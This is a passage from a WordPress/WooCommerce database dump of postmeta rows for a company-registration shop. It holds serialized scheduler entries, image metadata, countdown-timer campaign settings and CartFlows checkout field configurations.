uler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566361006;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19665,33044,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566361006;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19668,33047,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566365256;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19667,33046,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566365256;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19670,33049,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566369298;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19669,33048,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566369298;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20251,33225,'_wcf_flow_id','33134'),(20252,33225,'_wcf_bump_product',''),(19672,33051,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566373394;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17491,31525,'enable_sticky','no'),(17492,31525,'sticky_bar_dismissible','no'),(17493,31525,'sticky_bar_position','top'),(17494,31525,'sticky_bar_bg_color','#eeeeee'),(17495,31525,'sticky_bar_padding','5'),(17496,31525,'sticky_bar_close_btn_color','#ffffff'),(17497,31525,'_hurryt_sticky_bar_display_on','all_pages'),(17498,31525,'sticky_bar_pages','a:1:{i:0;s:2:\"[]\";}'),(19682,33061,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566395275;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20227,33225,'_payment_method','payfast'),(20228,33225,'_payment_method_title','PayFast'),(19662,33041,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566352412;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19661,33040,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566352412;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17440,31526,'_wcct_appearance_timer_single_border_color','#f2f2f2'),(17441,31526,'_wcct_appearance_timer_single_border_style','none'),(17442,31526,'_wcct_appearance_timer_single_display','{{countdown_timer}}\nPrices go up when the timer hits zero.'),(17443,31526,'_wcct_location_bar_show_single','1'),(17444,31526,'_wcct_location_bar_single_location','4'),(17445,31526,'_wcct_appearance_bar_single_skin','stripe_animate'),(17446,31526,'_wcct_appearance_bar_single_edges','rounded'),(17447,31526,'_wcct_appearance_bar_single_orientation','rtl'),(17448,31526,'_wcct_appearance_bar_single_bg_color','#dddddd'),(16751,31300,'wcf-steps','a:2:{i:0;a:3:{s:2:\"id\";i:31362;s:5:\"title\";s:10:\"Checkout 2\";s:4:\"type\";s:8:\"checkout\";}i:1;a:3:{s:2:\"id\";i:31390;s:5:\"title\";s:11:\"Thank You 2\";s:4:\"type\";s:8:\"thankyou\";}}'),(19646,33025,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566302702;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19645,33024,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566302702;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17040,31334,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2019/07/company-register-1.gif\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"company-register-1-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"company-register-1-300x300.gif\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/gif\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"company-register-1-400x250.gif\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/gif\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"company-register-1-400x284.gif\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/gif\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"company-register-1-510x382.gif\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/gif\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"company-register-1-400x516.gif\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/gif\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"company-register-1-400x400.gif\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/gif\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"company-register-1-510x510.gif\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/gif\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"company-register-1-100x100.gif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/gif\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"company-register-1-400x400.gif\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/gif\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"company-register-1-510x510.gif\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"company-register-1-100x100.gif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(16943,31327,'_thumbnail_id','31334'),(16944,31327,'yikes_woo_products_tabs','a:0:{}'),(16945,31327,'_sku','MAI009'),(16946,31327,'_regular_price','250'),(16947,31327,'total_sales','1'),(16948,31327,'_tax_status','taxable'),(16949,31327,'_tax_class',''),(16950,31327,'_manage_stock','no'),(16951,31327,'_backorders','no'),(16952,31327,'_sold_individually','yes'),(16953,31327,'_virtual','no'),(16954,31327,'_downloadable','no'),(16955,31327,'_download_limit','-1'),(16956,31327,'_download_expiry','-1'),(16957,31327,'_stock',NULL),(16958,31327,'_stock_status','instock'),(16959,31327,'_wc_average_rating','0'),(16960,31327,'_wc_review_count','0'),(16961,31327,'_product_version','3.7.0'),(16962,31327,'_price','250'),(16963,31327,'_regular_price_wmcp','{\"USD\":\"\"}'),(16964,31327,'_sale_price_wmcp',''),(16965,31327,'_et_pb_post_hide_nav','default'),(16966,31327,'_et_pb_page_layout','et_right_sidebar'),(16967,31327,'_et_pb_side_nav','off'),(16968,31327,'_et_pb_use_builder',''),(16969,31327,'_et_builder_version','BB|Divi|3.27.3'),(16970,31327,'_et_pb_first_image',''),(16971,31327,'_et_pb_truncate_post',''),(16972,31327,'_et_pb_ab_stats_refresh_interval','hourly'),(16973,31327,'_et_pb_old_content',''),(16974,31327,'_et_pb_enable_shortcode_tracking',''),(16975,31327,'_et_pb_custom_css',''),(16976,31327,'_et_pb_gutter_width','3'),(16980,31331,'_menu_item_type','custom'),(16981,31331,'_menu_item_menu_item_parent','31251'),(16982,31331,'_menu_item_object_id','31331'),(16983,31331,'_menu_item_object','custom'),(16984,31331,'_menu_item_target',''),(16985,31331,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(16986,31331,'_menu_item_xfn',''),(16987,31331,'_menu_item_url','https://companyregistration.online/shop/maintaning-our-company/company-register-2/'),(17490,31525,'call_to_action','a:11:{s:7:\"enabled\";s:2:\"no\";s:4:\"text\";s:10:\"Learn More\";s:3:\"url\";s:0:\"\";s:7:\"new_tab\";s:2:\"no\";s:9:\"text_size\";s:2:\"15\";s:10:\"text_color\";s:7:\"#ffffff\";s:8:\"bg_color\";s:7:\"#000000\";s:13:\"border_radius\";s:1:\"3\";s:9:\"y_padding\";s:2:\"10\";s:9:\"x_padding\";s:2:\"15\";s:7:\"spacing\";s:1:\"5\";}'),(17452,31526,'_wcct_appearance_bar_single_border_style','none'),(17453,31526,'_wcct_appearance_bar_single_border_width','0'),(17454,31526,'_wcct_appearance_bar_single_border_color','#444444'),(17455,31526,'_wcct_campaign_menu_order','0'),(17456,31526,'_wcct_current_status_timing','running'),(17457,31526,'_edit_lock','1563658008:1'),(17458,31525,'mode','2'),(17459,31525,'duration','a:4:{i:0;s:1:\"0\";i:1;s:1:\"1\";i:2;s:1:\"0\";i:3;s:1:\"0\";}'),(17460,31525,'end_datetime','2019-07-27 09:00 PM'),(17461,31525,'restart','3'),(17462,31525,'wc_products_selection_type','2'),(17463,31525,'wc_position','2.3'),(17464,31525,'actions','a:1:{i:0;a:4:{s:2:\"id\";s:1:\"1\";s:11:\"redirectUrl\";s:0:\"\";s:7:\"message\";s:0:\"\";s:13:\"wcStockStatus\";s:7:\"instock\";}}'),(17465,31525,'days_visibility','yes'),(17466,31525,'hours_visibility','yes'),(17467,31525,'minutes_visibility','yes'),(17468,31525,'seconds_visibility','yes'),(17469,31525,'block_separator_visibility','yes'),(17470,31525,'labels','a:4:{s:4:\"days\";s:4:\"days\";s:5:\"hours\";s:3:\"hrs\";s:7:\"minutes\";s:4:\"mins\";s:7:\"seconds\";s:4:\"secs\";}'),(17471,31525,'campaign_display','block'),(17472,31525,'campaign_align','center'),(17473,31525,'digit_color','#0e8af0'),(17474,31525,'digit_size','35'),(17475,31525,'label_size','14'),(17476,31525,'label_color','#db0a76'),(17477,31525,'label_case','uppercase'),(17478,31525,'block_display','block'),(17479,31525,'block_bg_color',''),(17480,31525,'block_size','50'),(17481,31525,'block_padding','0'),(17482,31525,'block_spacing','5'),(17483,31525,'block_border_color',''),(17484,31525,'block_border_width','0'),(17485,31525,'block_border_radius','0'),(17486,31525,'headline_size','40'),(17487,31525,'headline_color','#f02d5a'),(17488,31525,'headline_position','1'),(17489,31525,'headline_spacing','5'),(19647,33026,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566308021;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19648,33027,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566308021;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17256,31390,'cartflows_imported_step','yes'),(17257,31390,'_wp_page_template','cartflows-canvas'),(17258,31390,'_et_pb_post_hide_nav','default'),(17259,31390,'_et_pb_page_layout','et_right_sidebar'),(17260,31390,'_et_pb_side_nav','off'),(17261,31390,'_et_pb_use_builder','on'),(17262,31390,'wcf-field-google-font-url','//fonts.googleapis.com/css?family=Poppins|Poppins:600'),(17263,31390,'wcf-active-tab','wcf-thankyou-fields'),(17264,31390,'wcf-tq-advance-options-fields','yes'),(17265,31390,'wcf-show-overview-section','yes'),(17266,31390,'wcf-show-details-section','yes'),(17267,31390,'wcf-show-billing-section','no'),(17268,31390,'wcf-show-shipping-section','no'),(17269,31390,'_et_pb_show_page_creation','off'),(17270,31390,'_et_pb_built_for_post_type','page'),(17271,31390,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"31390\" /]'),(17272,31390,'_thumbnail_id','4632'),(17273,31390,'_et_builder_version','BB|Divi|3.26.3'),(17274,31390,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:2;s:10:\"devanagari\";i:3;s:9:\"latin-ext\";}}'),(18042,32039,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564654766;}'),(17275,31390,'_wp_old_slug','product3-thank-you-2'),(17276,31390,'wcf-tq-font-family','\'Poppins\', sans-serif'),(17277,31390,'wcf-tq-heading-font-family','\'Poppins\', sans-serif'),(17278,31390,'wcf-tq-heading-font-wt','600'),(17279,31390,'wcf-tq-container-width','750'),(17280,31390,'wcf-tq-section-bg-color','#f1f1f1'),(17281,31390,'enable-to-import','1'),(17282,31390,'_uabb_lite_converted','yes'),(17283,31390,'site-sidebar-layout','default'),(17284,31390,'site-content-layout','default'),(17285,31390,'theme-transparent-header-meta','default'),(17450,31526,'_wcct_appearance_bar_single_height','12'),(17451,31526,'_wcct_appearance_bar_single_display','Hurry up! Just <span>{{remaining_units}}</span> items left in stock\n{{counter_bar}}'),(19656,33035,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566338447;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19655,33034,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566338447;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19658,33037,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566342409;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19657,33036,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566342409;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17412,31525,'_edit_lock','1563657809:1'),(17413,31525,'_edit_last','1'),(17414,31525,'headline_visibility','yes'),(17415,31525,'label_visibility','yes'),(17416,31525,'wc_enable','no'),(17417,31526,'_wcct_campaign_type','fixed_date'),(17418,31526,'_wcct_campaign_fixed_recurring_start_date','2019-07-19'),(17419,31526,'_wcct_campaign_fixed_recurring_start_time','12:00 AM'),(17420,31526,'_wcct_campaign_fixed_end_date','2019-07-25'),(17421,31526,'_wcct_campaign_fixed_end_time','12:00 AM'),(17422,31526,'_wcct_deal_enable_goal','1'),(17423,31526,'_wcct_deal_units','custom'),(17424,31526,'_wcct_deal_custom_units','8'),(17425,31526,'_wcct_deal_inventory_goal_for','recurrence'),(17426,31526,'_wcct_deal_custom_units_allow_backorder','no'),(17427,31526,'_wcct_deal_end_campaign','no'),(17428,31526,'_wcct_location_timer_show_single','1'),(17429,31526,'_wcct_location_timer_single_location','4'),(17430,31526,'_wcct_appearance_timer_single_skin','round_ghost'),(17431,31526,'_wcct_appearance_timer_single_bg_color','#8cc63f'),(19574,32954,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566151410;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19573,32953,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566151410;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17064,31362,'wcf_fields_shipping','a:9:{s:19:\"shipping_first_name\";a:5:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;}s:18:\"shipping_last_name\";a:5:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;}s:16:\"shipping_company\";a:5:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;}s:16:\"shipping_country\";a:6:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;}s:18:\"shipping_address_1\";a:6:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;}s:18:\"shipping_address_2\";a:7:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;}s:13:\"shipping_city\";a:5:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;}s:14:\"shipping_state\";a:8:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:16:\"shipping_country\";}s:17:\"shipping_postcode\";a:6:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;}}'),(16745,31298,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"woocommerce-placeholder.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-610x610.png\";s:5:\"width\";i:610;s:6:\"height\";i:610;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"woocommerce-placeholder-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:37:\"woocommerce-placeholder-1080x1080.png\";s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(16744,31298,'_wp_attached_file','woocommerce-placeholder.png'),(19569,32949,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566143259;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19570,32950,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566143259;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(19567,32947,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566139348;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(16739,5,'_et_pb_gutter_width','3'),(17435,31526,'_wcct_appearance_timer_single_label_days','days'),(17436,31526,'_wcct_appearance_timer_single_label_hrs','hrs'),(17432,31526,'_wcct_appearance_timer_single_text_color','#444444'),(17433,31526,'_wcct_appearance_timer_single_font_size_timer','26'),(17434,31526,'_wcct_appearance_timer_single_font_size','13'),(16740,31296,'_wp_attached_file','2019/07/Favicon.png'),(16741,31296,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:138;s:6:\"height\";i:141;s:4:\"file\";s:19:\"2019/07/Favicon.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"Favicon-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Favicon-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(16746,31300,'cartflows_imported_flow','yes'),(16979,31327,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20148,33159,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566524621;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17439,31526,'_wcct_appearance_timer_single_border_width','1'),(17437,31526,'_wcct_appearance_timer_single_label_mins','mins'),(17438,31526,'_wcct_appearance_timer_single_label_secs','secs'),(17189,31362,'wcf-header-logo-image',''),(17190,31362,'wcf-header-logo-width',''),(17191,31362,'wcf-custom-script',''),(17192,31362,'wcf-product-opt-title','Your Products'),(17193,31362,'wcf-checkout-discount-coupon','a:1:{i:0;s:9:\"regmeless\";}'),(17194,31362,'wcf-order-bump-image','https://companyregistration.online/wp-content/uploads/2019/07/company-register-1.gif'),(17039,31334,'_wp_attached_file','2019/07/company-register-1.gif'),(17062,31362,'cartflows_imported_step','yes'),(17063,31362,'wcf_fields_billing','a:11:{s:18:\"billing_first_name\";a:5:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;}s:17:\"billing_last_name\";a:5:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;}s:15:\"billing_company\";a:5:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;}s:15:\"billing_country\";a:6:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;}s:17:\"billing_address_1\";a:6:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;}s:17:\"billing_address_2\";a:7:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;}s:12:\"billing_city\";a:5:{s:5:\"label\";s:11:\"Town / 